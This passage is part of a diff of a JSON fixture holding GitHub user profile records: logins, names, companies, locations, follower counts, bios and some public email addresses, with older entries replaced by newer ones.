"2024-06-30T15:40:34Z", + "node_id": "MDQ6VXNlcjU4MDUyNjM=", + "bio": "", "is_hireable": false, - "twitter_username": "vincentcox_be" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3107, + "pk": 8499, "fields": { - "nest_created_at": "2024-09-12T03:14:11.415Z", - "nest_updated_at": "2024-09-12T03:14:11.415Z", - "name": "proabiral", - "login": "proabiral", + "nest_created_at": "2024-09-22T10:42:34.930Z", + "nest_updated_at": "2024-09-22T20:27:46.279Z", + "name": "Tàrin Gamberìni", + "login": "taringamberini", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22173232?v=4", - "company": "", - "location": "Nepal", + "avatar_url": "https://avatars.githubusercontent.com/u/4944077?v=4", + "company": "Regione Emilia-Romagna", + "location": "Italy", "collaborators_count": 0, - "following_count": 5, - "followers_count": 177, - "public_gists_count": 5, - "public_repositories_count": 31, - "created_at": "2016-09-13T13:28:06Z", - "updated_at": "2024-08-17T11:30:30Z", - "node_id": "MDQ6VXNlcjIyMTczMjMy", + "following_count": 21, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2013-07-04T21:10:12Z", + "updated_at": "2022-06-27T11:36:16Z", + "node_id": "MDQ6VXNlcjQ5NDQwNzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437928,24 +698402,24 @@ }, { "model": "github.user", - "pk": 3108, + "pk": 8500, "fields": { - "nest_created_at": "2024-09-12T03:14:12.248Z", - "nest_updated_at": "2024-09-12T03:14:12.248Z", - "name": "", - "login": "compactus", + "nest_created_at": "2024-09-22T10:42:35.237Z", + "nest_updated_at": "2024-09-22T20:27:46.596Z", + "name": "Preet Gami", + "login": "preetgami", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/115730157?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/109097825?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-10-13T16:28:06Z", - "updated_at": "2024-02-20T18:21:57Z", - "node_id": "U_kgDOBuXm7Q", + "public_repositories_count": 24, + "created_at": "2022-07-11T16:36:07Z", + "updated_at": "2024-09-19T12:51:18Z", + "node_id": "U_kgDOBoCzYQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437953,24 +698427,24 @@ }, { "model": "github.user", - "pk": 3109, + "pk": 8501, "fields": { - "nest_created_at": "2024-09-12T03:14:13.102Z", - "nest_updated_at": "2024-09-12T03:14:15.047Z", - "name": "shelu", - "login": "shelu16", + "nest_created_at": "2024-09-22T10:42:35.548Z", + "nest_updated_at": "2024-09-22T20:27:46.904Z", + "name": "Claude Michiels", + "login": "mickilous", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30596083?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1244773?v=4", "company": "", - "location": "", + "location": "Bruxelles", "collaborators_count": 0, - "following_count": 43, + "following_count": 4, "followers_count": 6, - "public_gists_count": 11, - "public_repositories_count": 82, - "created_at": "2017-07-31T12:39:24Z", - "updated_at": "2024-07-01T15:56:47Z", - "node_id": "MDQ6VXNlcjMwNTk2MDgz", + "public_gists_count": 3, + "public_repositories_count": 17, + "created_at": "2011-12-06T15:00:03Z", + "updated_at": "2024-01-31T15:13:53Z", + "node_id": "MDQ6VXNlcjEyNDQ3NzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437978,99 +698452,99 @@ }, { "model": "github.user", - "pk": 3110, + "pk": 8502, "fields": { - "nest_created_at": "2024-09-12T03:14:17.563Z", - "nest_updated_at": "2024-09-12T03:14:17.563Z", - "name": "Ahmed", - "login": "Alganad", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/96503379?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:42:36.842Z", + "nest_updated_at": "2024-09-22T20:27:48.213Z", + "name": "Robert Stoll", + "login": "robstoll", + "email": "rstoll@tutteli.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/5557885?v=4", + "company": "@tegonal ", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 14, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2021-12-21T23:21:31Z", - "updated_at": "2024-02-20T18:37:00Z", - "node_id": "U_kgDOBcCGUw", + "following_count": 11, + "followers_count": 53, + "public_gists_count": 3, + "public_repositories_count": 119, + "created_at": "2013-09-27T13:08:53Z", + "updated_at": "2024-08-21T14:21:45Z", + "node_id": "MDQ6VXNlcjU1NTc4ODU=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3111, + "pk": 8503, "fields": { - "nest_created_at": "2024-09-12T03:14:18.366Z", - "nest_updated_at": "2024-09-12T03:14:18.366Z", - "name": "", - "login": "mastercho", + "nest_created_at": "2024-09-22T10:42:37.188Z", + "nest_updated_at": "2024-09-22T20:27:48.546Z", + "name": "Pavan Kumar", + "login": "sunnypav", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10222100?v=4", - "company": "", - "location": "London", + "avatar_url": "https://avatars.githubusercontent.com/u/2037974?v=4", + "company": "Adobe Inc.", + "location": "Bangalore, India", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 4, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 40, - "created_at": "2014-12-17T14:55:49Z", - "updated_at": "2023-08-26T02:14:50Z", - "node_id": "MDQ6VXNlcjEwMjIyMTAw", + "public_repositories_count": 21, + "created_at": "2012-07-25T03:49:07Z", + "updated_at": "2024-06-11T17:54:50Z", + "node_id": "MDQ6VXNlcjIwMzc5NzQ=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3112, + "pk": 8504, "fields": { - "nest_created_at": "2024-09-12T03:14:19.225Z", - "nest_updated_at": "2024-09-12T03:14:30.905Z", - "name": "Komomon", - "login": "komomon", + "nest_created_at": "2024-09-22T10:42:37.511Z", + "nest_updated_at": "2024-09-22T20:27:48.853Z", + "name": "Olivier Jaquemet", + "login": "OlivierJaquemet", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52700174?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/618861?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1068, - "followers_count": 353, - "public_gists_count": 1, - "public_repositories_count": 82, - "created_at": "2019-07-09T10:00:14Z", - "updated_at": "2024-05-25T04:38:48Z", - "node_id": "MDQ6VXNlcjUyNzAwMTc0", - "bio": "Z2O安全攻防", + "following_count": 2, + "followers_count": 11, + "public_gists_count": 6, + "public_repositories_count": 12, + "created_at": "2011-02-15T09:22:45Z", + "updated_at": "2024-09-09T16:02:23Z", + "node_id": "MDQ6VXNlcjYxODg2MQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3113, + "pk": 8505, "fields": { - "nest_created_at": "2024-09-12T03:14:20.020Z", - "nest_updated_at": "2024-09-12T03:14:20.020Z", - "name": "", - "login": "falc410", + "nest_created_at": "2024-09-22T10:42:37.821Z", + "nest_updated_at": "2024-09-22T20:27:49.166Z", + "name": "Niklas Mehner", + "login": "NiklasMehner", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/575187?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1682195?v=4", "company": "", - "location": "", + "location": "Lüneburg/Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 3, + "followers_count": 5, "public_gists_count": 0, "public_repositories_count": 7, - "created_at": "2011-01-20T20:57:51Z", - "updated_at": "2024-05-15T07:37:44Z", - "node_id": "MDQ6VXNlcjU3NTE4Nw==", + "created_at": "2012-04-26T14:41:22Z", + "updated_at": "2023-12-17T09:54:40Z", + "node_id": "MDQ6VXNlcjE2ODIxOTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438078,49 +698552,49 @@ }, { "model": "github.user", - "pk": 3114, + "pk": 8506, "fields": { - "nest_created_at": "2024-09-12T03:14:20.847Z", - "nest_updated_at": "2024-09-12T03:14:20.847Z", - "name": "Thomas Countz", - "login": "Thomascountz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19786848?v=4", - "company": "@Zendesk", - "location": "Copenhagen, Denmark", + "nest_created_at": "2024-09-22T10:42:38.159Z", + "nest_updated_at": "2024-09-22T20:27:49.490Z", + "name": "Michele Preziuso", + "login": "mpreziuso", + "email": "mpreziuso@kaosdynamics.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10457038?v=4", + "company": "@kaosdynamics ", + "location": "London, United Kingdom", "collaborators_count": 0, - "following_count": 18, - "followers_count": 29, - "public_gists_count": 57, - "public_repositories_count": 81, - "created_at": "2016-06-06T22:46:52Z", - "updated_at": "2024-09-11T09:38:11Z", - "node_id": "MDQ6VXNlcjE5Nzg2ODQ4", - "bio": "I'm a piece of work. Software developer, climber, & bread baker.", + "following_count": 40, + "followers_count": 13, + "public_gists_count": 3, + "public_repositories_count": 13, + "created_at": "2015-01-09T00:18:39Z", + "updated_at": "2024-07-08T15:49:38Z", + "node_id": "MDQ6VXNlcjEwNDU3MDM4", + "bio": "", "is_hireable": false, - "twitter_username": "thomascountz" + "twitter_username": "mpreziuso" } }, { "model": "github.user", - "pk": 3115, + "pk": 8507, "fields": { - "nest_created_at": "2024-09-12T03:14:21.700Z", - "nest_updated_at": "2024-09-12T03:14:21.700Z", - "name": "Ben Cox", - "login": "benjojo", + "nest_created_at": "2024-09-22T10:42:38.499Z", + "nest_updated_at": "2024-09-22T20:27:49.807Z", + "name": "Michael Ziluck", + "login": "Michael-Ziluck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1504626?v=4", - "company": "", - "location": "London", + "avatar_url": "https://avatars.githubusercontent.com/u/10745543?v=4", + "company": "@ServiceManagementGroup", + "location": "Chicago, IL", "collaborators_count": 0, - "following_count": 109, - "followers_count": 1277, - "public_gists_count": 25, - "public_repositories_count": 120, - "created_at": "2012-03-05T21:50:07Z", - "updated_at": "2024-09-05T13:14:36Z", - "node_id": "MDQ6VXNlcjE1MDQ2MjY=", + "following_count": 3, + "followers_count": 6, + "public_gists_count": 15, + "public_repositories_count": 12, + "created_at": "2015-01-28T18:08:12Z", + "updated_at": "2024-01-11T16:53:17Z", + "node_id": "MDQ6VXNlcjEwNzQ1NTQz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438128,124 +698602,149 @@ }, { "model": "github.user", - "pk": 3116, + "pk": 8508, "fields": { - "nest_created_at": "2024-09-12T03:14:22.548Z", - "nest_updated_at": "2024-09-12T03:14:22.548Z", - "name": "somename123", - "login": "m040601", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8886?v=4", - "company": "somecompany1", - "location": "somelocation2", + "nest_created_at": "2024-09-22T10:42:38.823Z", + "nest_updated_at": "2024-09-22T20:27:50.141Z", + "name": "Joseph Witthuhn", + "login": "JosephWitthuhnTR", + "email": "joseph.witthuhn@thomsonreuters.com", + "avatar_url": "https://avatars.githubusercontent.com/u/28634003?v=4", + "company": "@ThomsonReuters", + "location": "Eagan, Minnesota, USA", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 19, - "public_repositories_count": 31, - "created_at": "2008-04-30T00:48:57Z", - "updated_at": "2023-09-29T08:21:54Z", - "node_id": "MDQ6VXNlcjg4ODY=", - "bio": "this is my biozzz", + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-05-11T19:20:12Z", + "updated_at": "2024-09-20T18:22:37Z", + "node_id": "MDQ6VXNlcjI4NjM0MDAz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3117, + "pk": 8509, "fields": { - "nest_created_at": "2024-09-12T03:14:23.404Z", - "nest_updated_at": "2024-09-12T03:14:23.404Z", - "name": "Sébastien Copin", - "login": "cosad3s", + "nest_created_at": "2024-09-22T10:42:39.143Z", + "nest_updated_at": "2024-09-22T20:27:50.459Z", + "name": "Jonathan Putney", + "login": "jcputney", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2116674?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42720634?v=4", + "company": "@noverant ", + "location": "Raleigh, NC", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 10, + "public_gists_count": 3, + "public_repositories_count": 18, + "created_at": "2018-08-26T18:22:26Z", + "updated_at": "2024-08-12T03:31:41Z", + "node_id": "MDQ6VXNlcjQyNzIwNjM0", + "bio": "VP, Technology @noverant LMS", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8510, + "fields": { + "nest_created_at": "2024-09-22T10:42:39.456Z", + "nest_updated_at": "2024-09-22T20:27:50.769Z", + "name": "Jeff Walker", + "login": "Jeff-Walker", + "email": "cavedog123@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1640710?v=4", "company": "", - "location": "France", + "location": "Memphis, TN", "collaborators_count": 0, - "following_count": 54, - "followers_count": 64, - "public_gists_count": 1, - "public_repositories_count": 25, - "created_at": "2012-08-08T12:43:16Z", - "updated_at": "2024-07-24T17:55:44Z", - "node_id": "MDQ6VXNlcjIxMTY2NzQ=", - "bio": "Independent Cybersecurity Engineer", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 3, + "public_repositories_count": 22, + "created_at": "2012-04-13T15:27:18Z", + "updated_at": "2024-04-25T15:48:29Z", + "node_id": "MDQ6VXNlcjE2NDA3MTA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3118, + "pk": 8511, "fields": { - "nest_created_at": "2024-09-12T03:14:24.268Z", - "nest_updated_at": "2024-09-12T03:14:24.268Z", - "name": "Peter Thaleikis", - "login": "spekulatius", + "nest_created_at": "2024-09-22T10:42:40.132Z", + "nest_updated_at": "2024-09-22T20:27:51.399Z", + "name": "Henrique Pinto", + "login": "pintohen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8433587?v=4", - "company": "@bringyourownideas ", - "location": "127.0.0.1", + "avatar_url": "https://avatars.githubusercontent.com/u/97101738?v=4", + "company": "msg life Iberia", + "location": "Vila Nova de Gaia, Porto, Portugal", "collaborators_count": 0, - "following_count": 1590, - "followers_count": 559, - "public_gists_count": 6, - "public_repositories_count": 55, - "created_at": "2014-08-13T02:00:28Z", - "updated_at": "2024-09-04T13:47:14Z", - "node_id": "MDQ6VXNlcjg0MzM1ODc=", - "bio": "Builder of Tools and Packages. Software engineer focused passionated about open source, Laravel, and InfoSec. ", - "is_hireable": true, + "following_count": 9, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2022-01-04T12:26:42Z", + "updated_at": "2024-09-21T23:35:02Z", + "node_id": "U_kgDOBcmnqg", + "bio": "software engineer @ msg life Iberia", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3119, + "pk": 8512, "fields": { - "nest_created_at": "2024-09-12T03:14:25.082Z", - "nest_updated_at": "2024-09-12T03:14:25.082Z", - "name": "Feylinchen", - "login": "Dastano", + "nest_created_at": "2024-09-22T10:42:40.454Z", + "nest_updated_at": "2024-09-22T20:27:51.712Z", + "name": "Helly Guo", + "login": "hellyguo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/197081?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1480942?v=4", "company": "", - "location": "", + "location": "Zhejiang, China", "collaborators_count": 0, - "following_count": 0, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2010-02-04T21:06:17Z", - "updated_at": "2024-08-29T10:36:31Z", - "node_id": "MDQ6VXNlcjE5NzA4MQ==", - "bio": "", - "is_hireable": true, + "following_count": 142, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2012-02-28T05:58:10Z", + "updated_at": "2024-09-01T11:22:40Z", + "node_id": "MDQ6VXNlcjE0ODA5NDI=", + "bio": "A programmer, using java, learning rust.\r\nKnowing a little of everything but having no one expert skill.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3120, + "pk": 8513, "fields": { - "nest_created_at": "2024-09-12T03:14:25.916Z", - "nest_updated_at": "2024-09-12T03:14:25.916Z", + "nest_created_at": "2024-09-22T10:42:40.773Z", + "nest_updated_at": "2024-09-22T20:27:52.035Z", "name": "", - "login": "Awada34", + "login": "HJW8472", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/70324542?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/50944183?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-08-27T11:31:13Z", - "updated_at": "2023-06-30T22:29:27Z", - "node_id": "MDQ6VXNlcjcwMzI0NTQy", + "public_repositories_count": 1, + "created_at": "2019-05-23T07:37:06Z", + "updated_at": "2020-07-13T05:32:31Z", + "node_id": "MDQ6VXNlcjUwOTQ0MTgz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438253,24 +698752,24 @@ }, { "model": "github.user", - "pk": 3121, + "pk": 8514, "fields": { - "nest_created_at": "2024-09-12T03:14:26.740Z", - "nest_updated_at": "2024-09-12T03:14:26.740Z", - "name": "dropberry", - "login": "dropberry", + "nest_created_at": "2024-09-22T10:42:41.088Z", + "nest_updated_at": "2024-09-22T20:27:52.348Z", + "name": "Debajit Kumar Phukan", + "login": "DebajitKumarPhukan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95830709?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/71944582?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 4, - "created_at": "2021-12-08T23:42:42Z", - "updated_at": "2024-09-10T12:36:24Z", - "node_id": "U_kgDOBbZCtQ", + "created_at": "2020-09-26T19:24:13Z", + "updated_at": "2023-11-20T19:28:46Z", + "node_id": "MDQ6VXNlcjcxOTQ0NTgy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438278,24 +698777,24 @@ }, { "model": "github.user", - "pk": 3122, + "pk": 8515, "fields": { - "nest_created_at": "2024-09-12T03:14:27.550Z", - "nest_updated_at": "2024-09-12T03:14:27.550Z", - "name": "", - "login": "YugoCode", + "nest_created_at": "2024-09-22T10:42:46.207Z", + "nest_updated_at": "2024-09-22T20:27:57.529Z", + "name": "Karl Düüna", + "login": "DeadAlready", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21986752?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1038164?v=4", + "company": "https://nodeswat.com", + "location": "Estonia", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-09-04T14:34:19Z", - "updated_at": "2024-07-10T21:05:54Z", - "node_id": "MDQ6VXNlcjIxOTg2NzUy", + "followers_count": 55, + "public_gists_count": 39, + "public_repositories_count": 38, + "created_at": "2011-09-09T09:16:29Z", + "updated_at": "2024-04-10T12:14:05Z", + "node_id": "MDQ6VXNlcjEwMzgxNjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438303,99 +698802,99 @@ }, { "model": "github.user", - "pk": 3123, + "pk": 8516, "fields": { - "nest_created_at": "2024-09-12T03:14:28.372Z", - "nest_updated_at": "2024-09-12T03:14:28.372Z", + "nest_created_at": "2024-09-22T10:42:57.374Z", + "nest_updated_at": "2024-09-22T20:28:08.718Z", "name": "", - "login": "AnImpulsiveHuman", + "login": "veshtov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64655668?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10483707?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 23, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2020-05-01T17:02:59Z", - "updated_at": "2023-07-31T13:13:06Z", - "node_id": "MDQ6VXNlcjY0NjU1NjY4", + "public_repositories_count": 9, + "created_at": "2015-01-11T07:56:02Z", + "updated_at": "2024-09-08T03:09:34Z", + "node_id": "MDQ6VXNlcjEwNDgzNzA3", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3124, + "pk": 8517, "fields": { - "nest_created_at": "2024-09-12T03:14:29.216Z", - "nest_updated_at": "2024-09-12T03:14:29.216Z", - "name": "", - "login": "supreme2k", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57444632?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:43:02.733Z", + "nest_updated_at": "2024-09-22T20:28:14.153Z", + "name": "Shubhayu Majumdar", + "login": "shubhayu-64", + "email": "majumdarshubhayu@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/68614625?v=4", + "company": "Student", + "location": "Kolkata, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 7, + "followers_count": 74, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-11-06T12:54:14Z", - "updated_at": "2023-10-08T17:10:45Z", - "node_id": "MDQ6VXNlcjU3NDQ0NjMy", - "bio": "", + "public_repositories_count": 72, + "created_at": "2020-07-21T19:43:13Z", + "updated_at": "2024-09-13T17:38:45Z", + "node_id": "MDQ6VXNlcjY4NjE0NjI1", + "bio": "Cloud Engineer @BlueVector-AI | Ex ML Research Intern - IIT KGP | Auth0 Ambassador | GDG Cloud Kolkata ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "shubhayu64" } }, { "model": "github.user", - "pk": 3125, + "pk": 8518, "fields": { - "nest_created_at": "2024-09-12T03:14:30.034Z", - "nest_updated_at": "2024-09-12T03:14:30.034Z", - "name": "", - "login": "hlein", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4372440?v=4", + "nest_created_at": "2024-09-22T10:44:11.500Z", + "nest_updated_at": "2024-09-22T20:29:21.776Z", + "name": "Kaushik Sivashankar", + "login": "k4u5h1k", + "email": "kaushik.sivashankar@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/59250093?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 14, - "public_gists_count": 1, - "public_repositories_count": 25, - "created_at": "2013-05-08T04:53:48Z", - "updated_at": "2024-04-02T03:26:02Z", - "node_id": "MDQ6VXNlcjQzNzI0NDA=", + "following_count": 14, + "followers_count": 33, + "public_gists_count": 18, + "public_repositories_count": 44, + "created_at": "2019-12-26T09:23:59Z", + "updated_at": "2024-09-21T15:33:06Z", + "node_id": "MDQ6VXNlcjU5MjUwMDkz", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3126, + "pk": 8519, "fields": { - "nest_created_at": "2024-09-12T03:14:31.785Z", - "nest_updated_at": "2024-09-12T03:14:31.785Z", - "name": "", - "login": "encodedguy", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65826142?v=4", + "nest_created_at": "2024-09-22T10:44:12.139Z", + "nest_updated_at": "2024-09-22T20:29:22.430Z", + "name": "Dimitrios Papageorgiou", + "login": "z3y50n", + "email": "dim_papag@windowslive.com", + "avatar_url": "https://avatars.githubusercontent.com/u/33282622?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 83, + "following_count": 7, + "followers_count": 13, "public_gists_count": 3, - "public_repositories_count": 100, - "created_at": "2020-05-23T17:41:14Z", - "updated_at": "2024-08-28T18:47:04Z", - "node_id": "MDQ6VXNlcjY1ODI2MTQy", + "public_repositories_count": 21, + "created_at": "2017-11-01T10:45:07Z", + "updated_at": "2024-09-16T14:22:06Z", + "node_id": "MDQ6VXNlcjMzMjgyNjIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438403,24 +698902,24 @@ }, { "model": "github.user", - "pk": 3127, + "pk": 8520, "fields": { - "nest_created_at": "2024-09-12T03:14:34.292Z", - "nest_updated_at": "2024-09-12T03:14:34.292Z", + "nest_created_at": "2024-09-22T10:44:12.506Z", + "nest_updated_at": "2024-09-22T20:29:22.741Z", "name": "", - "login": "Phoenix1112", + "login": "vikas-kundu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42475284?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47297799?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2018-08-17T16:17:48Z", - "updated_at": "2024-07-26T07:43:21Z", - "node_id": "MDQ6VXNlcjQyNDc1Mjg0", + "public_repositories_count": 9, + "created_at": "2019-02-03T14:05:25Z", + "updated_at": "2022-11-21T19:04:51Z", + "node_id": "MDQ6VXNlcjQ3Mjk3Nzk5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438428,49 +698927,99 @@ }, { "model": "github.user", - "pk": 3128, + "pk": 8521, "fields": { - "nest_created_at": "2024-09-12T03:14:35.124Z", - "nest_updated_at": "2024-09-12T03:14:35.124Z", - "name": "Sayed Ali", - "login": "BLACK-SCORP10", + "nest_created_at": "2024-09-22T10:44:13.175Z", + "nest_updated_at": "2024-09-22T20:29:23.369Z", + "name": "Rishabh Jain", + "login": "rishi23root", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102329978?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/66913499?v=4", + "company": "", + "location": "india", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 32, + "public_gists_count": 7, + "public_repositories_count": 34, + "created_at": "2020-06-14T15:17:20Z", + "updated_at": "2024-09-16T20:20:00Z", + "node_id": "MDQ6VXNlcjY2OTEzNDk5", + "bio": "I am Rishi, Programmer,\r\nlike it when my mind goes crazy and stuck in a problem\r\nand love the happiness when find a solution.", + "is_hireable": true, + "twitter_username": "rishi23jain" + } +}, +{ + "model": "github.user", + "pk": 8522, + "fields": { + "nest_created_at": "2024-09-22T10:44:13.837Z", + "nest_updated_at": "2024-09-22T20:29:23.998Z", + "name": "Tarunesh Gautam", + "login": "tarunxsh", + "email": "taruneshkumar1234@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/32979497?v=4", + "company": "@Simpplr", + "location": "Delhi, India", + "collaborators_count": 0, + "following_count": 63, + "followers_count": 15, + "public_gists_count": 10, + "public_repositories_count": 80, + "created_at": "2017-10-21T10:36:32Z", + "updated_at": "2024-09-21T15:15:38Z", + "node_id": "MDQ6VXNlcjMyOTc5NDk3", + "bio": "Software Engineer | C++ | Python | JavaScript | Django | Node | Express | React", + "is_hireable": true, + "twitter_username": "tarunxsh" + } +}, +{ + "model": "github.user", + "pk": 8523, + "fields": { + "nest_created_at": "2024-09-22T10:44:14.149Z", + "nest_updated_at": "2024-09-22T20:29:24.317Z", + "name": "", + "login": "keamanansiber", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65588154?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 18, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2022-03-24T21:51:30Z", - "updated_at": "2024-08-30T18:53:39Z", - "node_id": "U_kgDOBhlueg", - "bio": "", + "following_count": 3, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2020-05-19T06:25:12Z", + "updated_at": "2022-10-03T05:41:33Z", + "node_id": "MDQ6VXNlcjY1NTg4MTU0", + "bio": "Hatma Suryotrisongko", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3129, + "pk": 8524, "fields": { - "nest_created_at": "2024-09-12T03:14:35.984Z", - "nest_updated_at": "2024-09-12T03:14:35.984Z", + "nest_created_at": "2024-09-22T10:44:14.462Z", + "nest_updated_at": "2024-09-22T20:29:24.673Z", "name": "", - "login": "TGRBirdFlying", + "login": "krinistof", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52350736?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/24738331?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 149, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-06-29T12:46:51Z", - "updated_at": "2024-04-16T07:41:24Z", - "node_id": "MDQ6VXNlcjUyMzUwNzM2", + "following_count": 10, + "followers_count": 5, + "public_gists_count": 4, + "public_repositories_count": 10, + "created_at": "2016-12-23T20:02:31Z", + "updated_at": "2024-08-07T22:08:29Z", + "node_id": "MDQ6VXNlcjI0NzM4MzMx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438478,74 +699027,74 @@ }, { "model": "github.user", - "pk": 3130, + "pk": 8525, "fields": { - "nest_created_at": "2024-09-12T03:14:36.829Z", - "nest_updated_at": "2024-09-12T03:16:19.118Z", - "name": "Eric Smith", - "login": "prisoner881", + "nest_created_at": "2024-09-22T10:44:14.786Z", + "nest_updated_at": "2024-09-22T20:29:24.998Z", + "name": "Bushra Ashfaque", + "login": "bushra2001", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38230821?v=4", - "company": "LockStep Technology Group", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61081924?v=4", + "company": "NED University of Engineering and Technology", + "location": "Karachi, Pakistan", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-04-09T22:57:56Z", - "updated_at": "2024-01-20T23:16:12Z", - "node_id": "MDQ6VXNlcjM4MjMwODIx", - "bio": "", + "public_repositories_count": 25, + "created_at": "2020-02-15T11:04:26Z", + 